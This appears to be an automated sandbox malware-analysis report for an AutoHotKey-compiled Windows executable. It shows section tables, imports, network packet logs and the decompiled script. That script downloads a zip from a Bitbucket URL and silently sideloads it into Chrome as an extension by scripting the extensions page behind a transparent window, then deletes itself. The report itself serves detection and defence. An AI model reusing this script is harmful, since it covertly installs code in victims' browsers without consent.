                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                        Sections

                                                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                        .text0x10000xdcab60xdcc00False0.536633812288data6.54343953119IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                        .rdata0xde0000x30e8e0x31000False0.280657087054data4.98137003823IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                        .data0x10f0000xc3c80x5000False0.25078125data3.33948267169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                        .pdata0x11c0000x78b40x7a00False0.480436731557data5.99059981014IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                        text0x1240000x258d0x2600False0.46484375data5.7779389798IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA
                                                                                                                                                                                                                        data0x1270000x6ec00x7000False0.47119140625data6.45735927966IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                        .rsrc0x12e0000x32b80x3400False0.379356971154data5.0017761768IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                        Resources

                                                                                                                                                                                                                        NameRVASizeTypeLanguageCountry
                                                                                                                                                                                                                        RT_ICON0x12e3f80xe98dBase IV DBT of 8.DBF, block length 3584, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                                                                                                                                                                                        RT_ICON0x12f2900x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                                                                        RT_ICON0x12f6f80x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                                                                        RT_ICON0x12fb600x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                                                                        RT_ICON0x12ffc80x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                                                                        RT_MENU0x1300f00x2c8dataEnglishUnited States
                                                                                                                                                                                                                        RT_DIALOG0x1303b80xe8dataEnglishUnited States
                                                                                                                                                                                                                        RT_ACCELERATOR0x1304a00x48dataEnglishUnited States
                                                                                                                                                                                                                        RT_RCDATA0x1304e80x67cASCII textEnglishUnited States
                                                                                                                                                                                                                        RT_GROUP_ICON0x130b640x14dataEnglishUnited States
                                                                                                                                                                                                                        RT_GROUP_ICON0x130b780x14dataEnglishUnited States
                                                                                                                                                                                                                        RT_GROUP_ICON0x130b8c0x14dataEnglishUnited States
                                                                                                                                                                                                                        RT_GROUP_ICON0x130ba00x14dataEnglishUnited States
                                                                                                                                                                                                                        RT_GROUP_ICON0x130bb40x14dataEnglishUnited States
                                                                                                                                                                                                                        RT_VERSION0x130bc80x1fcdataEnglishUnited States
                                                                                                                                                                                                                        RT_MANIFEST0x130dc40x4f4ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                                                                                                                                                                        Imports

                                                                                                                                                                                                                        DLLImport
                                                                                                                                                                                                                        WSOCK32.dllgethostbyname, inet_addr, WSACleanup, gethostname, WSAStartup
                                                                                                                                                                                                                        WINMM.dllmixerGetLineInfoW, mixerGetDevCapsW, mixerOpen, mciSendStringW, joyGetPosEx, mixerGetLineControlsW, mixerGetControlDetailsW, mixerSetControlDetails, waveOutGetVolume, mixerClose, waveOutSetVolume, joyGetDevCapsW
                                                                                                                                                                                                                        VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                                                                                                                                                                        COMCTL32.dllImageList_Create, CreateStatusWindowW, ImageList_ReplaceIcon, ImageList_GetIconSize, ImageList_Destroy, ImageList_AddMasked
                                                                                                                                                                                                                        PSAPI.DLLGetProcessImageFileNameW, GetModuleBaseNameW, GetModuleFileNameExW
                                                                                                                                                                                                                        WININET.dllInternetOpenW, InternetOpenUrlW, InternetCloseHandle, InternetReadFileExA, InternetReadFile
                                                                                                                                                                                                                        KERNEL32.dllGetModuleFileNameW, GetSystemTimeAsFileTime, FindResourceW, SizeofResource, LoadResource, LockResource, GetFullPathNameW, GetShortPathNameW, FindFirstFileW, FindNextFileW, FindClose, FileTimeToLocalFileTime, SetEnvironmentVariableW, Beep, MoveFileW, OutputDebugStringW, CreateProcessW, GetFileAttributesW, WideCharToMultiByte, MultiByteToWideChar, GetExitCodeProcess, WriteProcessMemory, ReadProcessMemory, GetCurrentProcessId, OpenProcess, TerminateProcess, SetPriorityClass, SetLastError, GetEnvironmentVariableW, GetLocalTime, GetDateFormatW, GetTimeFormatW, GetDiskFreeSpaceExW, SetVolumeLabelW, CreateFileW, DeviceIoControl, GetDriveTypeW, GetVolumeInformationW, GetDiskFreeSpaceW, GetCurrentDirectoryW, CreateDirectoryW, ReadFile, WriteFile, DeleteFileW, SetFileAttributesW, LocalFileTimeToFileTime, SetFileTime, DeleteCriticalSection, GetSystemTime, GetSystemDefaultUILanguage, GetComputerNameW, GetSystemWindowsDirectoryW, GetTempPathW, EnterCriticalSection, LeaveCriticalSection, VirtualProtect, QueryDosDeviceW, CompareStringW, RemoveDirectoryW, CopyFileW, GetCurrentProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, FormatMessageW, GetPrivateProfileStringW, GetPrivateProfileSectionW, GetPrivateProfileSectionNamesW, WritePrivateProfileStringW, WritePrivateProfileSectionW, SetEndOfFile, GetACP, GetFileType, GetStdHandle, SetFilePointerEx, SystemTimeToFileTime, FileTimeToSystemTime, GetFileSize, IsWow64Process, VirtualAllocEx, VirtualFreeEx, EnumResourceNamesW, LoadLibraryExW, GlobalSize, HeapReAlloc, EncodePointer, HeapFree, DecodePointer, ExitProcess, HeapAlloc, IsValidCodePage, FlsGetValue, FlsSetValue, FlsFree, FlsAlloc, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RtlVirtualUnwind, RtlLookupFunctionEntry, GetCPInfo, GetVersionExW, GetModuleHandleW, FreeLibrary, GetProcAddress, LoadLibraryW, GetLastError, CreateMutexW, CloseHandle, GetExitCodeThread, SetThreadPriority, CreateThread, GetStringTypeExW, lstrcmpiW, GetCurrentThreadId, GlobalUnlock, GlobalFree, GlobalAlloc, GlobalLock, SetErrorMode, InitializeCriticalSection, SetCurrentDirectoryW, Sleep, GetTickCount, MulDiv, RtlCaptureContext, HeapSetInformation, GetVersion, HeapCreate, InitializeCriticalSectionAndSpinCount, HeapSize, HeapQueryInformation, GetCommandLineW, GetStartupInfoW, RtlUnwindEx, SetHandleCount, GetStringTypeW, RaiseException, RtlPcToFileHeader, LCMapStringW, GetConsoleCP, GetConsoleMode, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetOEMCP, SetFilePointer, FlushFileBuffers, WriteConsoleW, SetStdHandle, GetFileSizeEx, GetProcessHeap
                                                                                                                                                                                                                        USER32.dllMessageBeep, ClientToScreen, GetCursorInfo, GetLastInputInfo, GetSystemMenu, GetMenuItemCount, GetMenuItemID, GetSubMenu, GetMenuStringW, ExitWindowsEx, SetMenu, FlashWindow, GetPropW, SetPropW, RemovePropW, MapWindowPoints, RedrawWindow, SetWindowLongPtrW, SetParent, GetClassInfoExW, GetAncestor, UpdateWindow, GetMessagePos, GetClassLongPtrW, DefDlgProcW, CallWindowProcW, CheckRadioButton, IntersectRect, GetUpdateRect, PtInRect, CreateDialogIndirectParamW, GetWindowLongPtrW, CreateAcceleratorTableW, DestroyAcceleratorTable, InsertMenuItemW, SetMenuDefaultItem, RemoveMenu, SetMenuItemInfoW, IsMenu, GetMenuItemInfoW, CreateMenu, CreatePopupMenu, SetMenuInfo, AppendMenuW, DestroyMenu, TrackPopupMenuEx, GetDesktopWindow, CopyImage, CreateIconIndirect, CreateIconFromResourceEx, EnumClipboardFormats, GetWindow, BringWindowToTop, MessageBoxW, GetTopWindow, GetQueueStatus, SetDlgItemTextW, LoadAcceleratorsW, EnableMenuItem, GetMenu, CreateWindowExW, RegisterClassExW, LoadCursorW, DestroyIcon, IsCharAlphaW, IsZoomed, VkKeyScanExW, MapVirtualKeyExW, GetKeyboardLayoutNameW, ActivateKeyboardLayout, GetGUIThreadInfo, GetWindowTextW, mouse_event, WindowFromPoint, GetSystemMetrics, keybd_event, SetKeyboardState, GetKeyboardState, GetCursorPos, GetAsyncKeyState, AttachThreadInput, SendInput, UnregisterHotKey, RegisterHotKey, PostQuitMessage, SendMessageTimeoutW, UnhookWindowsHookEx, SetWindowsHookExW, PostThreadMessageW, IsCharAlphaNumericW, IsCharUpperW, IsCharLowerW, ToUnicodeEx, GetKeyboardLayout, CallNextHookEx, CharLowerW, ReleaseDC, GetDC, OpenClipboard, GetClipboardData, GetClipboardFormatNameW, CloseClipboard, SetClipboardData, EmptyClipboard, PostMessageW, FindWindowW, EndDialog, IsWindow, DispatchMessageW, TranslateMessage, ShowWindow, CountClipboardFormats, SetWindowLongW, ScreenToClient, IsDialogMessageW, GetDlgItem, SendDlgItemMessageW, DialogBoxParamW, SetForegroundWindow, DefWindowProcW, FillRect, DrawIconEx, GetSysColorBrush, GetSysColor, RegisterWindowMessageW, GetMonitorInfoW, EnumDisplayMonitors, SetClipboardViewer, IsIconic, SendMessageW, IsWindowEnabled, GetWindowLongW, GetKeyState, TranslateAcceleratorW, KillTimer, PeekMessageW, GetFocus, GetClassNameW, GetWindowThreadProcessId, GetForegroundWindow, EnumWindows, GetWindowTextLengthW, EnableWindow, InvalidateRect, SetLayeredWindowAttributes, SetWindowPos, SetWindowRgn, SetFocus, SetActiveWindow, EnumChildWindows, MoveWindow, GetWindowRect, GetClientRect, SystemParametersInfoW, AdjustWindowRectEx, DrawTextW, SetRect, GetIconInfo, SetWindowTextW, IsWindowVisible, BlockInput, GetMessageW, SetTimer, GetParent, GetDlgCtrlID, CharUpperW, IsClipboardFormatAvailable, CheckMenuItem, LoadImageW, MapVirtualKeyW, ChangeClipboardChain, DestroyWindow
                                                                                                                                                                                                                        GDI32.dllGetPixel, GetClipRgn, GetCharABCWidthsW, SetBkMode, CreatePatternBrush, SetBrushOrgEx, EnumFontFamiliesExW, CreateDIBSection, GdiFlush, SetBkColor, ExcludeClipRect, SetTextColor, GetClipBox, BitBlt, CreateCompatibleBitmap, GetSystemPaletteEntries, GetDIBits, CreateCompatibleDC, CreatePolygonRgn, CreateRectRgn, CreateRoundRectRgn, CreateEllipticRgn, DeleteDC, GetObjectW, GetTextMetricsW, GetTextFaceW, SelectObject, GetStockObject, CreateDCW, CreateSolidBrush, CreateFontW, FillRgn, GetDeviceCaps, DeleteObject
                                                                                                                                                                                                                        COMDLG32.dllCommDlgExtendedError, GetSaveFileNameW, GetOpenFileNameW
                                                                                                                                                                                                                        ADVAPI32.dllRegDeleteKeyW, RegSetValueExW, RegCreateKeyExW, RegQueryValueExW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, CloseServiceHandle, UnlockServiceDatabase, LockServiceDatabase, OpenSCManagerW, GetUserNameW, RegEnumKeyExW, RegEnumValueW, RegQueryInfoKeyW, RegOpenKeyExW, RegCloseKey, RegConnectRegistryW, RegDeleteValueW
                                                                                                                                                                                                                        SHELL32.dllDragQueryPoint, SHEmptyRecycleBinW, SHFileOperationW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetDesktopFolder, SHGetMalloc, SHGetFolderPathW, ShellExecuteExW, Shell_NotifyIconW, DragFinish, DragQueryFileW, ExtractIconW
                                                                                                                                                                                                                        ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, CoInitialize, CoUninitialize, CLSIDFromString, CLSIDFromProgID, CoGetObject, StringFromGUID2, CreateStreamOnHGlobal
                                                                                                                                                                                                                        OLEAUT32.dllSafeArrayGetLBound, GetActiveObject, SysStringLen, OleLoadPicture, SafeArrayUnaccessData, SafeArrayGetElemsize, SafeArrayAccessData, SafeArrayUnlock, SafeArrayPtrOfIndex, SafeArrayLock, SafeArrayGetDim, SafeArrayDestroy, SafeArrayGetUBound, VariantCopyInd, SafeArrayCopy, SysAllocString, VariantChangeType, VariantClear, SafeArrayCreate, SysFreeString

                                                                                                                                                                                                                        Version Infos

                                                                                                                                                                                                                        DescriptionData
                                                                                                                                                                                                                        LegalCopyright
                                                                                                                                                                                                                        InternalName
                                                                                                                                                                                                                        FileVersion1.1.33.06
                                                                                                                                                                                                                        ProductName
                                                                                                                                                                                                                        ProductVersion1.1.33.06
                                                                                                                                                                                                                        FileDescription
                                                                                                                                                                                                                        OriginalFilename
                                                                                                                                                                                                                        Translation0x0409 0x04b0

                                                                                                                                                                                                                        Possible Origin

                                                                                                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                        EnglishUnited States

                                                                                                                                                                                                                        Static AutoHotKey Info

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Code:; <COMPILER: v1.1.33.06> #NoTrayIcon SetTimer, ExitAHK, 40000 SetTitleMatchMode, 2 CoordMode, Window File_URL = https://bitbucket.org/betadevmode/devmode/downloads/block-floc.zip Extension_Name = %A_AppData%\chromeext.zip Extension_Path = %A_AppData%\Chrome FileRemoveDir, %Extension_Path%, 1 FileDelete, %Extension_Name% UrlDownloadToFile, %File_URL%, %Extension_Name% RunWait PowerShell.exe -Command Expand-Archive -LiteralPath '%Extension_Name%' -DestinationPath '%Extension_Path%',,Hide While WinExist("ahk_exe chrome.exe"){ WinClose, ahk_exe chrome.exe Sleep 100 } Run, chrome.exe --start-maximized Sleep 100 st = ahk_class Chrome_WidgetWin_1 WinWait, %st% IfWinNotActive, %st%,, WinActivate, %st% WinGet, WinStatus, MinMax, %st% if (WinStatus != 0) WinRestore, ahk_exe chrome.exe WinMove, %st%,, 0, 0 , 500, 200 Send, {Blind}{LAlt Down}d{Lalt Up} WinMove, %st%,, 0, 0 , 500, 200 SendInput, chrome://extensions{Enter} Sleep, 1000 PixelGetColor, color, 469, 139, RGB PixelGetColor, nobm, 469, 107, RGB PixelGetColor, notdef, 469, 152, RGB WinSet, Transparent, 0, %st% if (color = 0xDADCE0 or color = 0xFFFFFF or nobm = 0xDADCE0 or nobm = 0xFFFFFF or notdef = 0xDADCE0 or notdef = 0xFFFFFF){ Send, {TAB 3}{Space}{Tab}{Space} }else{ Send, {TAB 4}{Space} } tt = ahk_class #32770 WinWait, %tt% IfWinNotActive, %tt%,, WinActivate, %tt% If WinActive("not avail") Send, {Blind}{Enter} WinMove, %tt%,, 0, 0 , 500, 200 SendInput, %Extension_Path%{Enter} Send, {Tab}{Enter} Sleep, 5000 While WinExist("ahk_exe chrome.exe"){ WinClose, ahk_exe chrome.exe Sleep 100 } FileDelete, %Extension_Name% ExitAHK: Run, %comspec% /c del "%A_ScriptFullPath%",,Hide ExitApp return

                                                                                                                                                                                                                        Network Behavior

                                                                                                                                                                                                                        Snort IDS Alerts

                                                                                                                                                                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                        12/06/21-19:08:32.689768UDP254DNS SPOOF query response with TTL of 1 min. and no authority53541548.8.8.8192.168.2.3

                                                                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                                                                        TCP Packets

                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                        Dec 6, 2021 19:08:32.707108974 CET49711443192.168.2.3104.192.141.1
                                                                                                                                                                                                                        Dec 6, 2021 19:08:32.707161903 CET44349711104.192.141.1192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:32.707273006 CET49711443192.168.2.3104.192.141.1
                                                                                                                                                                                                                        Dec 6, 2021 19:08:32.722043037 CET49711443192.168.2.3104.192.141.1
                                                                                                                                                                                                                        Dec 6, 2021 19:08:32.722068071 CET44349711104.192.141.1192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:33.065558910 CET44349711104.192.141.1192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:33.065676928 CET49711443192.168.2.3104.192.141.1
                                                                                                                                                                                                                        Dec 6, 2021 19:08:33.350286007 CET49711443192.168.2.3104.192.141.1
                                                                                                                                                                                                                        Dec 6, 2021 19:08:33.350327015 CET44349711104.192.141.1192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:33.350941896 CET44349711104.192.141.1192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:33.351027966 CET49711443192.168.2.3104.192.141.1
                                                                                                                                                                                                                        Dec 6, 2021 19:08:33.354154110 CET49711443192.168.2.3104.192.141.1
                                                                                                                                                                                                                        Dec 6, 2021 19:08:33.396871090 CET44349711104.192.141.1192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:33.512061119 CET44349711104.192.141.1192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:33.512196064 CET44349711104.192.141.1192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:33.512209892 CET49711443192.168.2.3104.192.141.1
                                                                                                                                                                                                                        Dec 6, 2021 19:08:33.512368917 CET49711443192.168.2.3104.192.141.1
                                                                                                                                                                                                                        Dec 6, 2021 19:08:33.530718088 CET49711443192.168.2.3104.192.141.1
                                                                                                                                                                                                                        Dec 6, 2021 19:08:33.530762911 CET44349711104.192.141.1192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:33.608535051 CET49712443192.168.2.352.217.81.204
                                                                                                                                                                                                                        Dec 6, 2021 19:08:33.608613014 CET4434971252.217.81.204192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:33.608782053 CET49712443192.168.2.352.217.81.204
                                                                                                                                                                                                                        Dec 6, 2021 19:08:33.610582113 CET49712443192.168.2.352.217.81.204
                                                                                                                                                                                                                        Dec 6, 2021 19:08:33.610608101 CET4434971252.217.81.204192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:34.049474955 CET4434971252.217.81.204192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:34.049648046 CET49712443192.168.2.352.217.81.204
                                                                                                                                                                                                                        Dec 6, 2021 19:08:34.058151007 CET49712443192.168.2.352.217.81.204
                                                                                                                                                                                                                        Dec 6, 2021 19:08:34.058173895 CET4434971252.217.81.204192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:34.058496952 CET4434971252.217.81.204192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:34.058598995 CET49712443192.168.2.352.217.81.204
                                                                                                                                                                                                                        Dec 6, 2021 19:08:34.059144020 CET49712443192.168.2.352.217.81.204
                                                                                                                                                                                                                        Dec 6, 2021 19:08:34.100872040 CET4434971252.217.81.204192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:34.230309010 CET4434971252.217.81.204192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:34.230396986 CET4434971252.217.81.204192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:34.230463982 CET49712443192.168.2.352.217.81.204
                                                                                                                                                                                                                        Dec 6, 2021 19:08:34.230473042 CET4434971252.217.81.204192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:34.230510950 CET4434971252.217.81.204192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:34.230530977 CET49712443192.168.2.352.217.81.204
                                                                                                                                                                                                                        Dec 6, 2021 19:08:34.230597973 CET4434971252.217.81.204192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:34.230600119 CET49712443192.168.2.352.217.81.204
                                                                                                                                                                                                                        Dec 6, 2021 19:08:34.230689049 CET49712443192.168.2.352.217.81.204
                                                                                                                                                                                                                        Dec 6, 2021 19:08:34.231493950 CET49712443192.168.2.352.217.81.204
                                                                                                                                                                                                                        Dec 6, 2021 19:08:34.231519938 CET4434971252.217.81.204192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:51.826280117 CET49713443192.168.2.3142.250.185.109
                                                                                                                                                                                                                        Dec 6, 2021 19:08:51.826339006 CET44349713142.250.185.109192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:51.826446056 CET49713443192.168.2.3142.250.185.109
                                                                                                                                                                                                                        Dec 6, 2021 19:08:51.826945066 CET49713443192.168.2.3142.250.185.109
                                                                                                                                                                                                                        Dec 6, 2021 19:08:51.826972008 CET44349713142.250.185.109192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:51.828838110 CET49715443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:51.828896046 CET44349715142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:51.828990936 CET49715443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:51.829207897 CET49715443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:51.829233885 CET44349715142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:51.834758043 CET49716443192.168.2.3142.250.186.78
                                                                                                                                                                                                                        Dec 6, 2021 19:08:51.834806919 CET44349716142.250.186.78192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:51.834930897 CET49716443192.168.2.3142.250.186.78
                                                                                                                                                                                                                        Dec 6, 2021 19:08:51.835205078 CET49716443192.168.2.3142.250.186.78
                                                                                                                                                                                                                        Dec 6, 2021 19:08:51.835225105 CET44349716142.250.186.78192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:51.879303932 CET44349713142.250.185.109192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:51.879723072 CET49713443192.168.2.3142.250.185.109
                                                                                                                                                                                                                        Dec 6, 2021 19:08:51.879791975 CET44349713142.250.185.109192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:51.880830050 CET44349713142.250.185.109192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:51.881655931 CET49713443192.168.2.3142.250.185.109
                                                                                                                                                                                                                        Dec 6, 2021 19:08:51.888830900 CET44349715142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:51.894992113 CET44349716142.250.186.78192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:51.901869059 CET49715443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:51.901905060 CET44349715142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:51.902465105 CET49716443192.168.2.3142.250.186.78
                                                                                                                                                                                                                        Dec 6, 2021 19:08:51.902484894 CET44349716142.250.186.78192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:51.902884007 CET44349716142.250.186.78192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:51.902968884 CET49716443192.168.2.3142.250.186.78
                                                                                                                                                                                                                        Dec 6, 2021 19:08:51.903678894 CET44349716142.250.186.78192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:51.903696060 CET44349715142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:51.903769016 CET49716443192.168.2.3142.250.186.78
                                                                                                                                                                                                                        Dec 6, 2021 19:08:51.903801918 CET49715443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.076075077 CET49717443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.076102972 CET44349717142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.076173067 CET49717443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.076513052 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.076561928 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.076618910 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.076798916 CET49717443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.076813936 CET44349717142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.077049017 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.077068090 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.125705957 CET44349717142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.125864029 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.130283117 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.130348921 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.130362988 CET49717443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.130420923 CET44349717142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.133385897 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.133476019 CET44349717142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.133503914 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.133564949 CET49717443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.164025068 CET49716443192.168.2.3142.250.186.78
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.164300919 CET49713443192.168.2.3142.250.185.109
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.164486885 CET44349716142.250.186.78192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.164597988 CET49716443192.168.2.3142.250.186.78
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.164623976 CET44349716142.250.186.78192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.164690971 CET44349713142.250.185.109192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.164735079 CET49713443192.168.2.3142.250.185.109
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.164983988 CET49715443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.165148973 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.165235043 CET49717443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.165386915 CET49715443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.165396929 CET44349715142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.165446043 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.165472031 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.165503025 CET44349717142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.165561914 CET49717443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.196631908 CET44349716142.250.186.78192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.196718931 CET49716443192.168.2.3142.250.186.78
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.196741104 CET44349716142.250.186.78192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.196805954 CET44349716142.250.186.78192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.196865082 CET49716443192.168.2.3142.250.186.78
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.198741913 CET49716443192.168.2.3142.250.186.78
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.198765039 CET44349716142.250.186.78192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.204891920 CET44349713142.250.185.109192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.205418110 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.205465078 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.205537081 CET49713443192.168.2.3142.250.185.109
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.205538034 CET49715443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.205557108 CET44349713142.250.185.109192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.205578089 CET44349715142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.208898067 CET44349717142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.216661930 CET44349713142.250.185.109192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.216814041 CET44349713142.250.185.109192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.216881037 CET49713443192.168.2.3142.250.185.109
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.216921091 CET49713443192.168.2.3142.250.185.109
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.218060017 CET49713443192.168.2.3142.250.185.109
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.218096972 CET44349713142.250.185.109192.168.2.3
